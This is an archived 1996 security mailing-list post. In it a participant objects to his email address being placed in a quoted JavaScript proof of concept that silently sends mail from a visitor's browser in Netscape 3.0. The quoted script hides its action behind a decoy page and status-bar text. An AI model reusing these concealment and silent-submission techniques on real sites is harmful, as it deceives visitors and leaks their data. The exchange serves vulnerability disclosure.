[3336] in WWW Security List Archive
Re:Java Script
daemon@ATHENA.MIT.EDU (David Ray)
Tue Oct 22 22:42:33 1996
Date: Tue, 22 Oct 1996 17:18:36 -0700
To: www-security@ns2.rutgers.edu
From: daver@idiom.com (David Ray)
Cc: htorgema@novice.uwaterloo.ca
Errors-To: owner-www-security@ns2.rutgers.edu
Everybody, please don't use my email address in the Javascript script that
Henri Torgemane (htorgema@novice.uwaterloo.ca) posted to this list. I have
no involvement in this script and Henri posted my email address in the
script without my consent/knowledge. I assume this was an oversight on his
part and not deliberate. I have tried to contact him at every email address
he has used to send messages, and each of my emails has bounced back so I
have no way to contact him. Thanks.
At 10:18 PM 10/21/96, htorgema@novice.uwaterloo.ca wrote:
> On Sun, 20 Oct 1996, David Ray wrote:
>
> > At 11:17 AM 10/20/96, I wrote:
> > > No, this is not correct. This bug existed in the short-lived Netscape
> > > version 2.0 which was replaced by version 2.0.1 a long time ago (in Web
> > > years).
> > >
> > > All versions of Netscape since then put up a dialog box asking the user if
> > > they are sure they want to send their email message, before it is sent.
> >
> > To be more specific, Netscape 3.0, under "Options... Network Preferences...
> > Protocols... There is a checkbox that says "Show alert before submitting a
> > form by email". If checked, it will put up a dialog box if a mailto: URL is
> > being submitted, asking the user to confirm or cancel. This checkbox is
> > checked by default, but can be unchecked. Perhaps the person who started
> > this thread had unchecked it.
> >
> > -Dave
>
> Alright.. then here's a working exploit:
>
> The following script send automatically a mail.
> It was tested with Netscape 3.0 for OSF1 and for AIX.
> It visibly doesn't care if the "Show alert before playing with email"
> checkbox is set.
>
> The use of a get method and of a text/plain
> mime-type seems to be a good enough reason for Netscape to send
> mail directly..
>
> This script try to hide its action as much as possible: A look at
> view-source when this page is loaded should show a very innocent-looking
> page..
>
>
> ---------- Begin of HTML source ----------
>
> <HTML>
> <SCRIPT>
> <!--
>
> //////////////////////////////////
> // First, some silly functions. //
> //////////////////////////////////
>
> var kickme;
>
> function hide() {
> top.status="I'm loading my world, please wait!";
> kickme=setTimeout("hide()",100);
> }
>
> function FabulousWorld() {
> clearTimeout(kickme);
> document.open("text/html");
> document.writeln("<HTML><HEAD><TITLE>My World!</TITLE><HEAD>");
> document.writeln("<BODY bgcolor=red text=green link=yellow>");
> document.writeln("<CENTER><H1> My world... </H1>");
> document.writeln("<H3><BLINK>This page is Javascript
>enabled!</BLINK></H3>");
> // Insert your bookmarks here...
> document.writeln("</BODY></HTML>");
> document.close();
> }
>
> ///////////////////////////////
> // Serious stuff begin here! //
> ///////////////////////////////
>
> function form_handler() {
> document.forms[0].method="get";
> document.forms[0].encoding="text/plain";
> document.forms[0].action="mailto:daver@idiom.com?subject=a good
>bug never dies...";
> // Remember to put YOUR adress when you test this page...
>
> document.forms[0].text.value="Browser used: "+navigator.appVersion;
>
> setTimeout("FabulousWorld()",12000); // This is not elegant..
> // but if we change the
>page before the mail is sent,
> // nothing is sent...
>
> kickme=setTimeout("hide()",100); // This is just a way to
> // hide some status
> // mentionning an
> // access to your
> // favorite SMTP server!
> }
>
>
>
> // Then, we generate a very usual page.
> // The only 'unusual' thing is the onsubmit() handler.
>
> document.writeln('\
> <HTML>\
> <HEAD>\
> <TITLE>Welcome in my world!</TITLE>\
> </HEAD>\
> <BODY bgcolor=black text=yellow>\
> <CENTER><H1>Welcome</H1>\
> <BR><BR><BR><BR><BR>\
> <FONT Color=White>\
> <FORM onsubmit="form_handler()" >\
> <INPUT type="hidden" name="text">\
> <INPUT TYPE="submit" value="Click Here to Enter my Fabulous Realm!" >\
> </CENTER>\ </FORM></FONT>\
> </BODY>\
> </HTML>');
>
>
> // -->
> </SCRIPT>
> </HTML>
>
> ---------- End of HTML source ----------
>
> ---------------
> Henri Torgemane http://www.undergrad.math.uwaterloo.ca/~htorgema/
>
> Never let your sense of morals prevent you from doing what is right.
> -- Salvor Hardin, "Foundation"
